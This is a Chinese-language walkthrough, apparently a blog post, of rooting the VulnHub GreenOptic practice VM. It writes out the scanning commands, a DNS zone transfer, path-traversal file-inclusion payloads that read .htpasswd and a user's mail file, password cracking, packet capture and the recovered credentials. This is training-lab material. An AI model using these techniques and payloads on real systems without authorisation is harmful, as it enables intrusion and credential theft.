今天實踐的是vulnhub的GreenOptic鏡像,
下載地址,https://download.vulnhub.com/greenoptic/GreenOptic.ova,
先是用workstation導入,點擊編輯配置就直接崩潰了,
于是又用virtualbox導入,做地址掃描,
sudo netdiscover -r 192.168.0.0/24,有地址了,190就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.190,

有web服務,瀏覽器訪問http://192.168.0.190:10000,

提示了域名,編輯/etc/hosts,添加IP和域名靜態關系,
192.168.0.190 websrv01.greenoptic.vm,
做一下目錄暴破,dirb http://websrv01.greenoptic.vm,

瀏覽器訪問http://websrv01.greenoptic.vm/account,

猜測有文件包含漏洞,瀏覽器上直接利用沒成功,換burpsuite,

發現其它域名,dig @192.168.0.190 greenoptic.vm axfr,

編輯/etc/hosts,添加IP和域名靜態關系,
192.168.0.190 recoveryplan.greenoptic.vm,
瀏覽器訪問http://recoveryplan.greenoptic.vm,

繼續用burpsuite做文件包含,../../../../var/www/.htpasswd,

獲取到staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.,
放到hash文件里,用John The Ripper進行破解,

獲取到staff/wheeler,回到上面的頁面進行登錄,
查看信息,發現提示,

下載dpi.zip,再繼續用burpsuite做文件包含,../../../../var/mail/sam,

獲取到解壓密碼HelloSunshine123,解壓后查看抓包文件,

獲取到alex/FwejAASD1,ssh登錄試試,ssh alex@192.168.0.190,
發現當前賬戶可以抓包,dumpcap -i lo -w test.pcap,

ftp可以把抓包下載出來,

查看抓包文件,

獲取到密碼,
AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=,
base64解碼,
echo "AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=" | base64 -d; echo "",
獲取到rootASfojoj2eozxczzmedlmedASASDKoj3o,
ASfojoj2eozxczzmedlmedASASDKoj3o應該就是root的密碼,
切到root,su -,id確認沒問題。
天億網絡安全
一顆小胡椒
HACK之道
云計算和網絡安全技術實踐
HACK學習呀
安全圈
中國信通院CAICT
系統安全運維
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
黑白之道
系統安全運維